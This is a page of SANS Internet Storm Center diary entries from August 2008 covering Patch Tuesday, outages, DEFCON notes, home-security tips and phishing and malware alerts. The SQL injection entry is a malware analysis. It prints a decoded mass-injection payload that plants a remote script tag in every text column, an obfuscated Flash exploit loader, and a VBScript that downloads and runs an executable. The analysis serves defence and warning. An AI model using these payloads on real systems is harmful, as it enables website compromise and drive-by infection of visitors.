Those of you running automatic updates may have noticed more updates being downloaded this week than what we mentioned in our Black Tuesday overview.  Among the additional updates was the one descirbed in this advisory which had to do with killbits for 3rd party ActiveX components.  The following comment from the overview sums it up nicely, so I'll repeat it here (thanx, anonymous):

Microsoft also released 953839, which is an updated variant of MS08-032 (950760). This is the ActiveX Killbits update. This release only adds 3rd-party killbits to the list, so they didn't give it a bulletin. But you still want to deploy it . . .

0 Comments

Published: 2008-08-15

OMFW 2008 reflections

It was my great privilege to participate in OMFW this past Sunday afternoon in Baltimore.  Unfortunately, I wasn't able to stay for the rest of DFRWS, the program looked pretty good (more on that below) and the folks that I've talked to who were there said it was a great conference.  While I love SANS conferences, the academic in me also likes traditional conferences with peer-reviewed papers.  Back to OMFW.  AAron was able to bring together an outstanding group of folks interested in "memory forensics" and there was some spirited discussion among the participants along with some really outstanding talks/demos (hopefully, I'll be able to update this story soon with a link to the slides from the talks).  It was also great to be able to put faces to folks who until then had only been handles in IRC or names on e-mail/blog posts in the past.  Next year's DFRWS (and hopefully another OMFW) will be in Montreal.  Keep your eye on it, there is a lot of good research going on there and don't forget about the SANS Forensics Summit coming up in Vegas in October.

 

A couple of the interesting papers from DFRWS that I need to read:

http://dfrws.org/2008/proceedings/p26-dolan-gavitt.pdf

http://dfrws.org/2008/proceedings/p33-morgan.pdf

http://dfrws.org/2008/proceedings/p52-vanBaar.pdf

http://dfrws.org/2008/proceedings/p112-cohen.pdf

http://dfrws.org/2008/proceedings/p128-thonnard.pdf

 

 

0 Comments

Published: 2008-08-15

Joomla user password reset vulnerability being actively exploited

We've received reports from several readers (thanx, Ronaldo and anonymous) that they have seen successful exploitation of the Joomla user password reset vulnerability announced on 12 Aug (with an exploit posted to milw0rm at about the same time).  If you have not yet upgraded to 1.5.6, do so ASAP

 

References:

http://developer.joomla.org/security/news/241-20080801-core-password-remind-functionality.html

http://www.us-cert.gov/current/index.html#joomla_password_reset_vulnerability

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2008-3681

0 Comments

Published: 2008-08-14

SBC Outage?

One of our readers, Michael, sent us in a heads up for a possible problem this morning with the Internet backbones.  Since this is our first report, does anyone know the scoop?  Joel reported on another issue with SBC earlier this week.

internetpulse.net shows the latency at LAX and a blogsite here. 

1 Comments

Published: 2008-08-14

DNSSEC for DShield.org

Too many times over the last few weeks, you heard that the real answer to all the DNS problems is DNSSEC. I decided to give it a try, and signed the dshield.org zone. DNSSEC is not exactly used very widely, and it is very possible that we will be running into some problems. If you experience any issues, please let us know (via isc.sans.org ;-) ). For most users, this will not change anything. It only matters if your resolver or your web browser actually verifies DNSSEC signature. Expect a few changes to our dshield.org zone while I experiment.

"Experimenting" with a production setup isnt exactly ideal. But there is always isc.sans.org. On the other hand, many of the aspects of DNSSEC just can't easily be simulated in a lab.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

0 Comments

Published: 2008-08-13

Podcast Episode Nine Posted

Okay, so after much crazyness concerning the Live Podcast from SANSFIRE of Episode 9, its finally posted.

So to give you a quick run down on what took us so long to get this thing posted, all of the mics that we were being used was going into a Soundboard, and the Soundboard audio was going directly out to a DVD recorder.  The DVD recorder also had video In from a camera in the back of the room that was being manned during the podcast.

Turns out, the camera was also recording!  Isn't that awesome?  Well, turns out, there is alot of FAIL in this story.

The camera, has mysteriously vanished.  Don't know where it went, but in it somewhere wherever it is, is a recording of the podcast.  If someone finds this mythical recording, please, feel free to give me the video/audio off of what is inside it.

Wait, you say, what about the DVD Recorder?  Well, we got the DVD, but the DVD has a big fat scratch down the middle of it, and we can't get the video off of it.

But luckily, I had garageband open, and I recorded the podcast using my built in mic on my macbook pro.  Now, this is not the best audio in the whole wide world, but at the time, we had no alternative. So THAT's what the audio from the podcast is.  Not out of the soundboard, not off of a video camera, but off of my built in mic on the MacBook Pro.

As a result the audio of some of the people, unless they were loud, or speaking into a mic, is not the best.  You'll hear some of this in the beginning, but once we got everyone speaking into mics, and being loud, it gets a bit better.

You'll also hear me whispering for beer at some point in the beginning, just disregard that, beer was needed. :)

Enjoy.

-- Joel Esler http://www.joelesler.net

0 Comments

Published: 2008-08-13

CNN switched to MSNBC

The malware spamming out CNN alerts is now picking on MSNBC. The links do lead to malware advise your users not to click on them! I have seen hundreds this morning, and a number of readers have written in about them.The headlines vary, but they all appear to start "BREAKING NEWS".

Cheers,
Adrien de Beaupré intru-shun.ca

 

6 Comments

Published: 2008-08-12

August 2008 Black Tuesday Overview

Overview of the August 2008 Microsoft patches and their status.

# Affected Contra Indications Known Exploits Microsoft rating ISC rating(*)
clients servers
MS08-041 Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution
Access, Snapshot Viewer

CVE-2008-2463

KB 955617

Known expoit code being actively exploited. 

This is a workaround by implementing a kill bit.

Critical Critical Important
MS08-042 Vulnerability in Microsoft Word Could Allow Remote Code Execution
Word

CVE-2008-2244
KB 955048

Known expoit code being actively exploited.

Important Critical Important
MS08-043

Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution

Excel
CVE-2008-3003

CVE-2008-3004

CVE-2008-3005

CVE-2008-3006

KB 954066 No publicly known exploits Critical Critical Important
MS08-044

Vulnerabilities in Microsoft Office Filters Could Allow Remote Code Execution

Office 2000, XP 2003, Works 8, Project

CVE-2008-3018
CVE-2008-3019
CVE-2008-3020

CVE-2008-3021

CVE-2008-3460

KB 924090
No publicly known exploits Critical Critical Important
MS08-045

Cumulative Security Update for Internet Explorer

Internet Explorer

CVE-2008-2254

CVE-2008-2255

CVE-2008-2256

CVE-2008-2257

CVE-2008-2258

CVE-2008-2259

KB 953838
Publically disclosed vulnerability but no known exploits. Critical PATCH NOW! PATCH NOW!
MS08-046

Vulnerability in Microsoft Windows Image Color Management System Could Allow Remote Code Execution

Windows 2000, XP, 2003


CVE-2008-2245

KB 952954
No publicly known exploits Critical Critical Important
MS08-047

Vulnerability in IPsec Policy Processing Could Allow Information Disclosure

Vista, 2008

CVE-2008-2246

KB 95373
No publicly known exploits Important Important Important
MS08-048

Security Update for Outlook Express and Windows Mail

Windows (OE, Mail)

CVE-2008-1448

KB 951066
No publicly known exploits Important Important Important
MS08-049

Vulnerability in Event System Could Allow Remote Code Execution

Windows

CVE-2008-1456

CVE-2008-1457

KB 950974
No publicly known exploits Important Important Important
MS08-050

Vulnerability in Windows Messenger Could Allow Information Disclosure

Windows Messenger

CVE-2008-0082

KB 955702
Publically disclosed vulnerability but no known exploits. Important Important Important
MS08-051

Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution

PowerPoint

CVE-2008-0120

CVE-2008-0121

CVE-2008-1455

KB 949785
No publicly known exploits Critical Critical Important
 
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating

  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

 

1 Comments

Published: 2008-08-12

Upcoming Infocon Test and new Color

Just a reminder... the test will start shortly.

 

This Friday, we will change the infocon to test a new admin interface. The test will last from 10:00-11:00 EDT (14:00-15:00 UTC). We will cycle through all colors. The pager notifications will be disabled during the test.

In the future, we are planning more regular infocon tests. Probably once a month, but the schedule has yet to be determined. In order ot conduct the tests, we will use a new color "Blue". Blue is used only for tests. Pager alerts will not be disabled for these tests to allow you to test them as well.

For details about the infocon, see http://isc.sans.org/infocon.html .

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

11 Comments

Published: 2008-08-12

VMWare ESX 3.5u2 Errors

VMWare has an important announcement if you are using VMWare ESX 3.5u2: This particular version will "expire" today (August 12th). If you restart the server, or move a virtual machine, you will get an error and you will not be able to start up the machine or use VMotion.

In short: If you use this exact version of VMWare ESX: Don't touch it until you hear from VMware about a solution. As a work around, you can change the system time to a date before Aug. 12th and turn off NTP.

Links:
communities.vmware.com/thread/162377

www.vdi.co.nz/

 

(thanks to a number of readers who alerted us about this! And thanks to all the Australian VMware users who of course ran into this first)

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute

0 Comments

Published: 2008-08-12

SBC Outage in Cleveland?

SBC Outage in Cleveland?  Perhaps? 

We've only had one report today of any problems, however, we don't know if SBC has changed their routes to avoid InternetHealth, or what the deal is, but it looks like something is up.

 

-- Joel Esler http://www.joelesler.net

1 Comments

Published: 2008-08-12

Gmail Outage?

Getting reports here at the Storm Center of an outage for Gmail.  I can't replicate it, it works fine from me from two Internet access points.  Is it still down on the interwebz for you guys?

-- Joel Esler http://www.joelesler.net

1 Comments

Published: 2008-08-12

Defcon 16 reflections

As promised I thought I would send up a post about Defcon, since it's fresh on alot of our minds.

Despite what people think, this is still a good con.  Still breakthrough talks happening, still "zero" days coming out.  Thousands of Thousands of people there. 

The Goons did a great job keeping everything flowing and organized.  (Although, could have ordered more badges on day 1?)  Even though the hotel posted guards around the ATMs, the Nevada Gaming Commission and some Cops were investigating a Horse Race Betting Machine (could have been totally legit, I didn't ask, I don't want to know.  It was just funny and coincidental), and various other interesting tidbits.

There were alot of interesting talks, obviously I couldn't attend them all, but from the ones that I heard were very interesting (BTW -- I am going to link to the presentations that I can, Click through AT YOUR OWN RISK :

Kaminsky -- Although I heard that there was basically nothing new posted, (I wasn't there, I was on a plane), it was interesting to hear him present about the vuln.

BGP Hack -- I did hear that this WAS the most interesting talk.  From what I heard/read, the guys that were presenting were able to successfully demonstrate how they changed the BGP routing at Defcon and sent everything through a box in New York, only to come back to Vegas.  Apparently they did this live.  Nice.

Snort plugin development -- Of personal interest to me, I sat in on this talk about Snort dynamic-preprocessor and rule development. 

(From an anonymous reader, i didn't see this one, nor hear about it.) -- The Medical Identity Theft talk at DC16 had an unannounced software release...  They wrote a tool to decrypt LWAPP packets and output a regular pcap file showing the unencrypted wireless client traffic.

Fyodor's Talk on Nmap -- Funny, excellent, interesting!

As always, the Capture the Flag contests were great and interesting.  Spot the fed was funny (as always), as were several of the other contests:

Sit through 30 hours of vendor presentations without sleeping to split US10k.

Automate a pellet/paintball gun to shoot targets.

Guitar Hero 3 (Holy cow, the guys that play this on Expert are CRAZY fast!)

The Freakshow party (as most the parties I went to were) on Saturday was awesome.  Props go to Sunshine and whomever was on her side for planning that one!  Great conference everyone.

 

-- Joel Esler http://www.joelesler.net

2 Comments

Published: 2008-08-11

Recovering

As everyone seems to be recovering this morning so far from Defcon, the news around the campfire has been quiet.  I am going to post some followups and interesting (to some) tidbits of Defcon a bit later today when I get a chance, right now, the Handlers are still sorting through email. 

 

If you have something you'd like to share, a particular talk you went to, or an 'undocumented' event... Contact us at http://isc.sans.org/contact.html

 

-- Joel Esler http://www.joelesler.net

0 Comments

Published: 2008-08-10

From lolly pops to afterglow

For those of you who are as many in years as some of the ISC handlers, you may remember that Kojak star Telly Savalas had a singing career as well as one playing a lollypop sucking cop in New York. He had a UK number 1 hit for the song "If" which had the immortal lyrics

"If a picture paints a thousand words,
Then why can't I paint you?"

Well in the security world we are following the lyrics of David Gates and using visualisation as a powerful technique in security log analysis.

The Davix Live CD distribution has been released and it contains a wide selection of security tools which are categorised in the Capture, Process and Visualise groups.

If you are interested in the power of Visualisation techniques in security analysis, it is well worth a look.

 

0 Comments

Published: 2008-08-10

Alex and Mark get the girls

Well as Blackhat and Defcon come to a close today in Vegas, some of the presentations are surfacing on the web. One which is already rightly attracting some interest is  "How To Impress Girls With Browser Memory Protection Bypasses" by Alexander Sotirov and Mark Dowd.

You can catch up with the presentation if you missed out on the Vegas heat by jumping across to their site.

0 Comments

Published: 2008-08-10

Fake IE 7 update spam doing the rounds

A number of readers have alerted us to a round of IE7 update spam being sent out. The e-mails read:


You are receiving this e-mail because you subscribed to MSN Featured Offers.
Microsoft respects your privacy. If you do not wish to receive this MSN Featured
Offers e-mail, please click the "Unsubscribe" link below. This will not unsubscribe
you from e-mail communications from third-party advertisers that may appear in MSN
Feature Offers. This shall not constitute an offer by MSN. MSN shall not be
responsible or liable for the advertisers' content nor any of the goods or service
advertised. Prices and item availability subject to change without notice.

Well, true enough Microsoft will not be responsible as its not from them! (Shock / Horror).

For the sample we received, VT has good coverage:

http://www.virustotal.com/analisis/18b97fb3bc30251051a8542a90401b6f

 

 

1 Comments

Published: 2008-08-09

A Few Tips to Help You Protect Your Home Computer

 

A few days ago I did a diary called Lessons Learned https://isc2.sans.org/diary.html?date=2008-08-03.  In the diary I talked about the many home computers out on the net and within our own networks that are compromised by malicious programs and are allowing our computers to be taken over by the bad guys on the net.   I had stated that it was our responsibility to educate the home and small business computer users to the dangers of the Internet and how they can protect themselves.  That is where the idea for this diary originated.  Let me first say, I don’t have all of the answers.  If I did, I would be rich and wouldn’t have to work again.  And not everyone is going to agree with the things I say.  If you don’t, if you have a better idea or alternative to one of my suggestions, or if you have one of your own, let me know.  I will add some of the best ideas to the diary. That said, here are some ideas…tips from me. 

 

  • Back up your important data.  At any point in time you could have a catastrophe happen and you suddenly realize your data is gone.  It has happened to the best of us.  You have a hard drive crash, you have a worm or other malicious program install and suddenly everything is gone.  That is Murphy’s Law when it comes to computers.  So back up your data, back it up often.  How often really depends on you and your data.  How often does your data change?  How long would it take you to recreate it?  These things are going to determine how often you will want to do backups.  As for how to do the backups, that depends too.  I do backups to disk using the old zip drives for all of the files that I want to be able to restore quickly.  I also use a service called Mozy backup. 

Mozy is great for storing your files online.  If you have less than 2 gig of data to backup you can use Mozy Home.  The data is encrypted and stored on a secure server and the backups run daily at what ever time you choose.  The first time your backup is going to take a while to run.  After that the backup is pretty quick due to the fact it will only back up the files that have changed.  If you have more than 2 Gig of data or if you want to go to the next level of security you can use Mozy Pro.  Mozy Pro adds more encryption, more security and faster upload and download and other features and enhancements at a very reasonable price.  There is a Mac client available as well as a PC version.  Go to www.mozy.com for more information.

 

Whatever methods you choose, make sure that you test the restore often, just to make sure that the data is really getting backed up.

 

  • Install an antivirus / anti spyware program and make sure that you check it often to ensure that it is getting the important updates.  If your ISP offers a Security Suite consider taking advantage of their service.  They have your best interest at heart but they are also interested in protecting their network and resources.  My company offers SecureIt (www.securitycoverage.com) to all of our customers.  This program combines anti-virus, anti-spyware, Windows Updates, Parental Controls, Firewall and reports all rolled into one package.  It never expires as long as you pay the bill. 

 

You can also go to your local office supply store or retail store and buy Norton, McAfee, Trend Micro, or any number of other packages.  Take them home, uninstall your old version, install the new version and do the updates immediately. Make sure you set the computer to update the files everyday and scan at least once a week.  Also make sure that you do your annual renewal.  If you fail to renew your subscription you will still be protected from the old exploits but not from any of the new ones. When you consider that there are 50 or so new virus/Trojan/Worms discovered every week that means that a lot of potential damage to your computer. Also, make sure that the package that you purchase has the Anti Spyware program with it as well.  In today’s world of exploits the spyware creators are actually more dangerous than the virus creators.

 

  • Install a firewall in your network.  If you have an “always on” connection to the Internet, if you use DSL or Cable Modem and your ISP doesn’t provide a router, you probably will want to run to your local Best Buy, Staples, or other computer/office supply store and pick up an inexpensive router,  just make sure that it has firewall capability.  Take it home and follow the manufacturer’s instructions to install. As soon as it is installed, find the instructions for changing the password and default IP address and change them immediately.  I just recently purchased a little Netgear device for my home network.  I was really impressed when I got it home and started working with it.  They had added a lot of great new features that can be used to secure your network.  If you are using a Wireless Network in your home, absolutely without a doubt, change your router to use encryption.  Here is a really good web site that explains how to secure your wireless network.  http://compnetworking.about.com/od/wirelesssecurity/tp/wifisecurity.htm

 

Just make sure that you turn on WPA (I recommend WPA2 as a minimum) and setup a secure key to protect your network from outside access.  This will prevent someone from jumping onto your wireless network and using your Internet connection for evil purposes or to hack into your computers. 

 

  • Apply all patches for your Operating System.  If you are like most people and you are using one of the Microsoft OS’s turn on your Automatic Updates. This will allow your computer to get the updates from Microsoft as soon as they are available.  Microsoft does their monthly updates the 2nd Tuesday of every month.  Check our Diary at isc.sans.org for explanation of what the updates cover. 

 

  • Create a new account for the Administrator account ….  And don’t use the name Admin, Superuser, or anything else that would indicate that it is the Administrator account. Use this account ONLY for things that require Administrator privilege.

 

  • Create another account that is a user account.  This account will be used on a day to day basis.  This will prevent some of the malicious content on the net from adhoc getting installed on your computer.

 

  • On all of your user accounts use strong passwords.  Don’t use anything that can be identified with you such as your name, birthdate, spouse/child’s name, pet’s name, or any word found in the dictionary.  Many programs exist on the Internet that can be used to crack easy passwords in a short amount of time.  Try using phrases or better still take the phrase, pull out the first and last letter of every word and use that as your password.  Or try replacing characters with numbers such as the 0 (zero) instead of the O, a ! instead of a 1, a 3 instead of an e, etc. Don’t use the same password on every site you logon to either.  In other words, don’t use the same password for your Amazon account or your ITunes account as you do for your Bank or Credit Card web sites.  Try mixing it up a little.  For instance, if you use the phrase The Fox Ran Fast and you bank at Wells Fargo and you have a Citibank Credit Card – try these for passwords.  Your base password might be tefxrnft – now for Amazon you add az and the year you were born, so Amazon password might look something like this tefxrnft54az, your bank password might be wftefxrnft54 and your Citibank password might be cb54tefxrbft. Now if you want to be really secure you can change the e to 3 as in wft3fxrnft5$.  I think you get my drift.  Be creative, but safe.  If you want to see how secure your current password is check out this site from Microsoft.

 www.microsoft.com/protect/yourself/password/checker.mspx

  •  Use care when surfing the net, chatting on IM and opening emails.  Don’t click on links in emails unless you are absolutely certain that you know the origin of the email.  Just because it looks like it came from Aunt Sally there is no guarantee that it really did.  It could have come from someone masquerading as Aunt Sally or it could have come from Aunt Sally’s infected computer.  When surfing the net be very careful that you only surf to trusted sites.  Even some trusted sites can become compromised, so if you are on a site or doing a search in your favorite search engine do so with caution.  If you are prompted to install a program, err on the side of caution and say no.  Never install software just because a pop up tells you to install.  This happened to my daughter the other day.  She is fully protected with AV, anti-spyware and firewall.  However, she did a Google search looking for some information on motorcycle parts.  A window popped up and said that she had a potential infection on her computer.  Did she want to install Anti Virus 2008 and clean up the infection?  She thought that was her AV program telling her to update and she clicked yes.  Of course it installed.  Then she got the message that she needed to buy the program in order to do the scan.  She kept clicking cancel but the program would not close.  A cleanup of her computer took about 2 hours and then a half hour lecture followed about clicking yes.  As my mom used to say when cleaning the leftovers out of the refrigerator – if in doubt throw it out.  Same goes for clicking.  If in doubt just say no.

 

  • Don’t download from untrusted sources.  There are some free programs on the Internet that can help with cleanup of your computer and help keep your computer running smoothly.  Some of these are good little tools.  Just be careful were you download from.  Only go to trusted sites to download programs. 

 

  • Set your email to plain text instead of html.  This will prevent the links in your email from being clickable and will prevent malicious code hidden in the email from running when you open the email.

 

  • Do some simple things to protect your computer.  Turn off File and Print Sharing, NetBios or any other service that you don’t need to use.  A sight with good information for home computer users using Windows computers is www.microsoft.com/protect.  This site has a lot of tips for the home computer user. 

 

  • There are many cool new toys that can add some zip and zam to the computing experience.  Many of them use the computers USB port to connect and have storage capabilities.  Whether it is your memory card for your digital camera, your MP3 player, your flash drive/thumb drive for removable storage, a removable hard drive or a digital photo frame you may get more than you bargained for when you plug them in.  We have had reports of malicious software on all of these devices, brand new, out of the box.  Use care when plugging in USB storage devices.   Before you plug in any USB device turn off autorun http://antivirus.about.com/od/securitytips/ht/autorun.htm and virus scan the device.

 

  • Never give your personal information on line.  There are a lot of phishing emails circulating attempting to convince you that your personal information is needed by your bank, Credit Card Company or other financial institution.  There is some circulating that want you to believe that they are from the IRS, the Dept of Revenue or another government agency.  They are simply trying to trick you into giving them your identity.  Don’t let them trick you…  don’t answer, just throw away. 

 

  • Know your computer – hard disk space available, is it running slow, unexpected pop-ups.  If anything seems out of the ordinary, slow down and take a close look.  Your computer may be trying to tell you something.  It may be warning you that something has gone amiss.  Run a virus scan, run a spyware scan, look at the Event Viewer logs.  Check the space on your hard drive.  Is it using a lot more now than you expect?  If it is you may have a backdoor on your computer and someone may be storing information on your computer that could be dangerous and costly.

 

  • Don’t download P2P programs.  Music/Video download from services like Limewire, Bearshare, Gnutella and Kazaa can open your computer up to massive exploits.  These services claim to allow you to download for free that which you would have to pay for at Napster, ITunes, NetFlix or any of the other legitimate download sights.  Why would you want to pay for something when you can get it for free, right?

 Well, as my momma’ used to say….  No such thing as somethin’ for nothin’.  Somewhere down the line you are going to have to pay.  These “free” downloads sites have a large payload.  That payload is an open door right into your computer’s hard drive and the network it is connected too.  This payload may include keyloggers or other nasty little parasites that can strip you of your personal identity.  My recommendation is don’t use P2P programs.  Download your entertainment from legitimate sites.

 

These are just a few of the tips that I have to offer.  Now let’s hear from our reader’s.  As I said, I don’t have all the answers and am open to input from our friends on the net.

 

Additional Resources

 

http://www.cert.org/homeusers/HomeComputerSecurity/

 

http://www.microsoft.com/protect/default.mspx

 

http://www.cert.org/tech_tips/home_networks.html

 

 

 

 

 

 

 

 

 

 

 

1 Comments

Published: 2008-08-09

Cleveland Outage

It appears that there is an outage in the Cleveland area.  Handler Steve and I have been looking at some problems that he has been having getting to various websites from where he is.  We discovered that according to the Internet Health Report the Cleveland area is NA.  I have not been able to find any information on line about the possible cause.  If any of you have information about the outage drop us an email, let us know what is going on. We will let you know as soon as we hear something.

www.internetpulse.net/

Update:

Well, the Internet Health Report is still showing Cleveland red across the board for SBC, but ISC reader Jack and I have been playing dodge the grey blocks with the AT&T online system to see if there is a problem, or not.

http://ipnetwork.bgtmo.ip.att.net/pws/network_delay.html

 Steve Hall

0 Comments

Published: 2008-08-08

More SQL Injections - very active right now

Scott one of our readers wrote in to let us know that attempts were being made on his servers through an SQL injection.  He was the first and assisted with analysis, but he was not the last.  Since the first report we have received several in the last 4 hours or so.  There seems to be a lot of activity with this particular attack.

It looks like a repeat/variant on the attacks mentioned by Bojan here.

Overview:

                                                                                   |---i/f16.swf
                                                              |--- i1.html ---|---i/f28.swf
                              |--- Flash.htm -------|                    |---i/f64.swf
                              |                              |--- f2.html ---|---i/f115.swf
                              |--- 06014.htm                             |---i/f45.swf
                              |                                                   |---i/f47.swf
w.js --- new.htm ---|--- yahoo.htm--|
                              |                       |
                              |--- office.htm--| --rondll32.exe--msyahoo.exe--wsv.exe/thunder.exe
                              |                       |
                              |--- ksx.htm ----|

The Injection:
The string being injected is

“DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726
368617228323535292C40432076617263686172283430303029204445434C415245205461626
C655F437572736------------snip ------------2204445414C4C4F43436F72%20AS%20CHAR(4000));
EXEC(@S); HTTP/1.1" 302 26 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET
CLR 1.1.4322; .NET CLR 2.0.50727)" :”

Which breaks down into:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u'
and (b.xtype=99 or b.xtype=35 or b.xtype=231or b.xtype=167) OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="hXXp://sdo. 
1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="hXXp:
//sdo.  1000mg.cn/csrss/w.js"></script><!--''') FETCH NEXT FROM  Table_Cursor INTO
@T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor% AS% CHAR(@)

Various types of sites seem to be hit at the moment.  From the reports we've had it is not specific to asp, cfm, php, but we don't have a lot of information on this just yet.

Next:

A user visiting the site will hit w.js which, if they are using english, will pull down new.htm.  new.htm reports to a stats site and has a number of iframes that grab the next set of htm pages,  flash.htm, 06014.htm, yahoo.htm, office.htm and ksx.htm.   Flash.htm checks to see if you are using IE or FF and selects either i1.html or f2.html

i1.html & f2.html

These file contains some java script:

<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
c="118,97,114,32,118,101,114,115,105,111----snip----116,46,119,114,105,116,101,40,34,34,41";c=eval("String.fromCharCode("+c+")");document.write("<script>"+c+"<\/script>");
</script>S

This expands out to:

var version=deconcept.SWFObjectUtil.getPlayerVersion();if(version['major']==9){document.getElementById('flashversion').innerHTML="";if(version['rev']==115){var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==64){var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==47){var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==45){var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==28){var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']==16){var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");so.write("flashcontent")}else if(version['rev']>=124){if(document.getElementById){document.getElementById('flashversion').innerHTML=""}}}; document.write("")

So depending on the flash version running and browser a different file is tried (the IE version uses i64, etc).   Detection for these is poor.  The IE versions 9/36 at VT detect the file as malicious and for FF 10/36 detect the file as being malicious.

yahoo.htm

The yahoo.htm file executes a vbscript to download rondll32.exe and saves it as msyahoo.exe after which it attempts to execute.

pre>
<object classid='clsid:24F3EAD6-8B87-4C1A-97DA-71C126BDA08F' id='test'></object>
<script language='vbscript'>
test.GetFile "hXXp://www.XXXXX.com/XXXX/rondll32.exe","c:\\msyahoo.exe",5,1,"tiany"
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run"c:\\msyahoo.exe"
</script
</pre>

Office.htm

Attempts to create activeX objects and pulls the same rondll32.exe.  It looks like rondll32.exe pulls down thunder.exe and wsv.exe

ksx.htm

Attempts get the browser to include the rondll32.exe file

Detection for rondll32.exe is good with most AV products catching this one.

06014.htm

was unavailable at the time I checked.

 

These attacks are happening right now.  The people that reported them identified the attacks in their log files and IDS systems.  It is good to see that people are checking their logs.   Currently about 4000 sites are infected, but mostly with the older version of w.js and a different go-to site.  This round looks like it has just started.  We'll keep an eye on how this develops.

 

Cheers.

Mark - Shearwater

 

 




 

5 Comments

Published: 2008-08-08

'CNN - My Custom Alert'

Thanks to our readers for letting us know that they are receiving a good amount of some very authentic looking phishing spam.  Although the email appears to be from CNN again, the origination address is not even obfuscated. ISC Handler, Daniel had written a story about the "CNN - Top Ten" storm worm a few days ago.

isc.sans.org/diary.html

These sort of emails have one big thing going for them.  The ability to get that user to click.  The CNN brand is trusted and recognized by almost all of our users.  Anyone seeing this email may not think twice about clicking on the link unless we tell them not to.  What a great opportunity for user training.  Send out a short Security Awareness Email to your users and explain to them what it really happening.  Ask them to tell their kids too. 

Far too many people are making this a very profitable way for cyber-criminals to make money.   Try to help your end users understand how to spot a fraudulent email address, how to dissect a domain name and find a masked url address.  Just think about all the infections and exploitations you may prevent.

For more information see the Anti-Phishing Working Group website.

http://www.antiphishing.org/
 

2 Comments

Published: 2008-08-07

Cleanup in isle 3 please. Asprox lying around

Whilst looking for something completely different I came across our old friend ASPROX See previous diary  from Marc

It seems that a lot of the domains used by this are still or again active.  Typically using fast flux.   The script that is being injected tends to be ngg.js, fgg.js, b.js or js.js.  This links to an IP address (still up) where a CGI script starts the road of pain.

Doing a quick search using our friend Google I ended up with 1,470,000 sites that are currently infected.  Now about 591,000 or so are b.js which seems to point to inactive domains so these are unlikely to do damage.  The rest is a mixture of active and inactive links. 

The high number of infected sites points to a couple of issues. 

  1. Sites are compromised and nobody notices
  2. Sites that are infected are not cleaned up.

Now the number of infected sites is high, but the sky is not falling, however if you have a spare few minutes do the following google search replacing yoursite  with your domain, e.g. sans.org (just cut and paste the whole search).

   site:yoursite    "script src=http://*/""ngg.js"|"js.js"|"b.js"

If the search returns results, you have some cleaning to do.

I did a quick breakdown of infected sites:

.gov       - 238                  .com      - 474K
.gov.au  - 927                  .org        - 79.9K
.gov.uk  - 2,930               .com.au  - 19.5K
.gov.cn  - 34K                  .co.uk    - 19.3K
.gov.za  - 424                  .ca         -  13.1K
.gov.br  - 263

I'll let you know next week if things are getting better or worse.

Happy cleaning.

Mark



 

0 Comments

Published: 2008-08-07

Olympic Clicks

You don’t have to be the oracle at Delphi to be able to predict that the next few weeks are going to be rife with attempts to phish, SPAM and scam with an Olympic theme. 

With the Olympics starting tomorrow our users are going to start receiving themed emails with something extra.  They will start receiving emails similar to the cnn.com top ten emails Daniel wrote about, but also messages from “news services”, storm with Olympic themed subjects, messages from Visa as Olympic sponsor, etc.  They will all ask the recipient to click.  So it is probably a good idea to remind your users of the dangers of the almighty click.

Now whilst 15 lashes with the cane for the first person to introduce nasties might sound like a great idea, in most countries this is frowned upon.  Likewise the advice of “don’t click anything” is also likely to be ignored. So we will have to come up with some ideas that will help prevent people from becomming victims.  Lets arm them with some rules of clicking safely.

Don’t click any links when
:

  • the email was sent by someone you do not know.
  • the email was sent by someone you might know, but whose name and email address do not match.  e.g sender: John Smith <Shjdyu@yahoo.com>  or Albert Einstein <stacyB@hotmail.com>
